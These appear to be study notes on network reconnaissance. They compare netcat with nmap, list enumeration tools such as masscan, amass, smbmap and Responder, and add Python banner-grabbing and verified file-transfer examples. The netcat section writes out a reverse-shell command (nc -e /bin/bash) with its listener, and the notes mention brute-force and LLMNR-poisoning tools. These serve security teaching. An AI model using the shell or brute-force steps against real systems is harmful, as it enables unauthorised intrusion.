Network Reconnaissance

🔍 nc (Netcat) vs Nmap

Manual Banner Grabbing / Custom Payloads

nc allows you to manually connect to a port and send custom input to see how the service responds. Example:

echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc target.com 80

This is useful for interacting with obscure or custom services where nmap’s scripts might not work.
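As an added example (not part of the original notes), here is the same HEAD probe done from Python sockets, with a read timeout so a silent service does not hang the probe the way a bare `nc` can, and a small parser that pulls out the `Server` header. The local fake HTTP listener and its banner string are constructed purely so the block can be run offline.

```python
import socket
import threading

# The exact probe from the nc one-liner above.
HEAD_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"
# Constructed banner for the local self-test listener (not a real product string).
FAKE_SERVER_LINE = "ExampleHTTPd/1.2 (constructed)"


def grab_banner(host: str, port: int, payload: bytes = b"",
                timeout: float = 3.0, max_bytes: int = 4096) -> bytes:
    """Connect, optionally send a probe, and return whatever the service sends back.

    Stops on EOF, on the byte cap, or when the service stays quiet for `timeout`
    seconds, so a service that never answers (or never closes) cannot stall the run.
    """
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if payload:
            sock.sendall(payload)
        received = 0
        while received < max_bytes:
            try:
                chunk = sock.recv(min(1024, max_bytes - received))
            except socket.timeout:
                break  # silent service: return whatever we collected so far
            if not chunk:
                break  # peer closed the connection
            chunks.append(chunk)
            received += len(chunk)
    return b"".join(chunks)


def http_server_header(banner: bytes):
    """Return the value of the HTTP Server header, or None if the banner is not HTTP
    or the server does not advertise one."""
    for line in banner.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"server":
            return value.strip().decode("latin-1")
    return None


def start_fake_http_server() -> int:
    """Constructed stand-in for a web server: accept one client, read its request headers,
    answer with a fixed Server banner, and close. Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(2.0)
            buf = b""
            while b"\r\n\r\n" not in buf:
                try:
                    chunk = conn.recv(1024)
                except socket.timeout:
                    break
                if not chunk:
                    break
                buf += chunk
            response = ("HTTP/1.0 200 OK\r\nServer: " + FAKE_SERVER_LINE
                        + "\r\nContent-Length: 0\r\n\r\n").encode()
            conn.sendall(response)
        srv.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return port


def demo():
    """Probe the constructed local listener and return the parsed Server value."""
    port = start_fake_http_server()
    banner = grab_banner("127.0.0.1", port, HEAD_PROBE)
    return http_server_header(banner)


if __name__ == "__main__":
    print(demo())
```

Point `grab_banner` at a host and port you are authorised to inventory and leave `payload` empty for protocols that speak first (SSH, SMTP, FTP); for HTTP you send the probe. The byte cap and timeout are what make this safe to run in a loop across your own service inventory.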


Reverse Shells and Bind Shells

nc can be used to set up reverse or bind shells, which is useful in post-exploitation or red teaming.

Example:

nc -lvnp 4444  # Listener
nc target.com 4444 -e /bin/bash  # Reverse shell

nmap is not designed for this kind of interaction.


Simple TCP/UDP Client

nc can act as a lightweight TCP or UDP client, useful for testing connectivity or service behavior.

Example:

nc -u target.com 53  # UDP DNS port

Port Knocking

You can use nc to simulate port knocking sequences manually, which nmap doesn’t support natively.


File Transfers

nc can be used to transfer files between systems over a raw TCP connection. Example:

# Sender
nc -l -p 1234 < file.txt

# Receiver
nc target.com 1234 > file.txt
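nc moves bytes over a raw TCP connection with no integrity check, authentication or encryption, so the receiver should compare the result against a digest the sender computed beforehand and shared out of band. As an added example (not from the original notes), this Python reproduces the listener/client pair above and verifies a SHA-256 digest on arrival; the sample file is constructed, the helper names are hypothetical, and the "tampered" demo flips one byte of the received copy to show the check failing.

```python
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path: str) -> str:
    """Hex SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def serve_file_once(path: str) -> int:
    """Sender side, like `nc -l -p PORT < file`: stream the file to the first client, then close.
    Binds 127.0.0.1 on an ephemeral port and returns it (hypothetical helper for the demo)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn, open(path, "rb") as f:
            conn.sendfile(f)  # closing the connection is the only "end of file" signal nc gives
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def receive_file(host: str, port: int, out_path: str, timeout: float = 5.0) -> int:
    """Receiver side, like `nc HOST PORT > file`: read until the sender closes. Returns bytes written."""
    total = 0
    with socket.create_connection((host, port), timeout=timeout) as sock, open(out_path, "wb") as out:
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            out.write(chunk)
            total += len(chunk)
    return total


def verify_file(path: str, expected_digest: str) -> bool:
    """The check nc itself never performs: compare the received file against the digest
    the sender published before the transfer (e.g. `sha256sum file.txt` on the sender)."""
    return sha256_of(path) == expected_digest


def _constructed_transfer(tamper: bool) -> bool:
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "file.txt")
    dst = os.path.join(tmp, "received.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(200_000))  # constructed sample payload
    published_digest = sha256_of(src)  # what the sender would announce beforehand
    port = serve_file_once(src)
    receive_file("127.0.0.1", port, dst)
    if tamper:
        # Simulate corruption or modification in transit by flipping one byte of the received copy.
        with open(dst, "r+b") as f:
            f.seek(1000)
            b = f.read(1)
            f.seek(1000)
            f.write(bytes([b[0] ^ 0xFF]))
    return verify_file(dst, published_digest)


def demo() -> bool:
    """Clean transfer: digest matches, returns True."""
    return _constructed_transfer(tamper=False)


def demo_tampered() -> bool:
    """Same transfer with one byte altered on arrival: digest mismatch, returns False."""
    return _constructed_transfer(tamper=True)


if __name__ == "__main__":
    print("clean transfer verified:", demo())
    print("tampered transfer verified:", demo_tampered())
```

The digest has to travel by a path the transfer itself cannot alter; a hash appended to the same unauthenticated stream proves nothing. When confidentiality matters, wrap the connection (for example with `ncat --ssl`, or tunnel over SSH) rather than relying on raw nc.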

🛠️ What nmap Does Better

  • Automated scanning and service detection
  • OS fingerprinting
  • Scriptable interactions via NSE (Nmap Scripting Engine)
  • Network topology mapping
  • Vulnerability detection

🧰 Other Essential Network Enumeration Tools

1. Masscan
  • Purpose: Extremely fast port scanner (like nmap but faster).
  • Use Case: Scanning large IP ranges quickly.
  • Note: Doesn’t do service detection like nmap.
masscan -p1-65535 192.168.1.0/24 --rate=10000

2. Netdiscover
  • Purpose: ARP-based network discovery tool.
  • Use Case: Identifying live hosts on a local subnet (great for internal networks).
netdiscover -r 192.168.1.0/24

3. Fping
  • Purpose: Fast ICMP ping sweeper.
  • Use Case: Quickly identify live hosts.
fping -a -g 192.168.1.0/24

4. Hping3
  • Purpose: Packet crafting tool.
  • Use Case: Advanced scanning, firewall testing, and TCP/IP stack auditing.
hping3 -S -p 80 -c 1 target.com

5. ZMap
  • Purpose: Internet-wide network scanner.
  • Use Case: High-speed scanning of large address spaces (used in research).

6. Amass
  • Purpose: DNS enumeration and attack surface mapping.
  • Use Case: Subdomain discovery and external asset mapping.
amass enum -d example.com

7. Nessus / OpenVAS
  • Purpose: Vulnerability scanners.
  • Use Case: Deep enumeration of services and known vulnerabilities.

8. Recon-ng
  • Purpose: Web-based reconnaissance framework.
  • Use Case: OSINT and passive network enumeration.

🧠 Summary

| Tool | Primary Use | Strengths |
|---|---|---|
| nmap | Port/service/OS detection | Versatile, scriptable |
| nc | Manual interaction, shell access | Lightweight, flexible |
| masscan | Fast port scanning | Speed |
| netdiscover | Local network discovery | ARP-based, simple |
| fping | ICMP sweep | Fast, efficient |
| hping3 | Packet crafting | Custom scans, firewall testing |
| zmap | Internet-wide scanning | Research-grade speed |
| amass | DNS and subdomain enumeration | External recon |
| Nessus/OpenVAS | Vulnerability scanning | Deep service analysis |

| Feature | nc (Netcat) | nmap |
|---|---|---|
| Manual banner grabbing | ✅ | ⚠️ (limited via NSE) |
| Reverse/bind shell | ✅ | ❌ |
| File transfer | ✅ | ❌ |
| Port scanning | ⚠️ (basic) | ✅ |
| OS/service detection | ❌ | ✅ |
| Scriptable enumeration | ❌ | ✅ (NSE) |

Additional Techniques (Work In Progress)

1. SMB/NetBIOS Enumeration
  • Useful in internal networks for discovering shares, users, and machines.
  • Tools:
    • enum4linux
    • smbclient
    • smbmap
    • nmap NSE scripts (smb-enum-shares, smb-enum-users)
2. SNMP Enumeration
  • If SNMP is open (UDP 161), it can leak system info, routing tables, etc.
  • Tools:
    • snmpwalk
    • onesixtyone
    • nmap NSE (snmp-info, snmp-interfaces)
3. LDAP Enumeration
  • Common in Active Directory environments.
  • Tools:
    • ldapsearch
    • nmap NSE (ldap-search, ldap-rootdse)
4. RPC Enumeration
  • Useful for enumerating users and groups on Windows systems.
  • Tools:
    • rpcclient
    • nmap NSE (rpcinfo, msrpc-enum)
5. VoIP Enumeration (SIP)
  • If SIP (port 5060) is open, you can enumerate extensions.
  • Tools:
    • svmap, svwar (SIPVicious)
6. NFS Enumeration
  • If NFS is exposed, you can list and mount shares.
  • Tools:
    • showmount
    • mount
    • nmap NSE (nfs-showmount, nfs-ls)
7. RDP/SSH/VNC Banner Grabbing
  • Use nmap, hydra, or rdpscan to identify versions and test brute-force.
8. Nmap NSE Scripting (Deep Dive)
  • NSE was mentioned above, but it’s worth emphasizing what its script categories cover:
    • Vulnerability detection (http-vuln-*, smb-vuln-*)
    • Auth bypass (http-auth-finder)
    • Brute-force (ftp-brute, ssh-brute, etc.)
    • Malware detection (http-malware-host)

🧰 Optional Tools to Mention
| Tool | Purpose |
|---|---|
| Responder | LLMNR/NBT-NS poisoning (internal) |
| CrackMapExec | Post-recon enumeration & exploitation |
| Metasploit | Auxiliary scanners and exploits |
| Ncrack | Network authentication brute-forcer |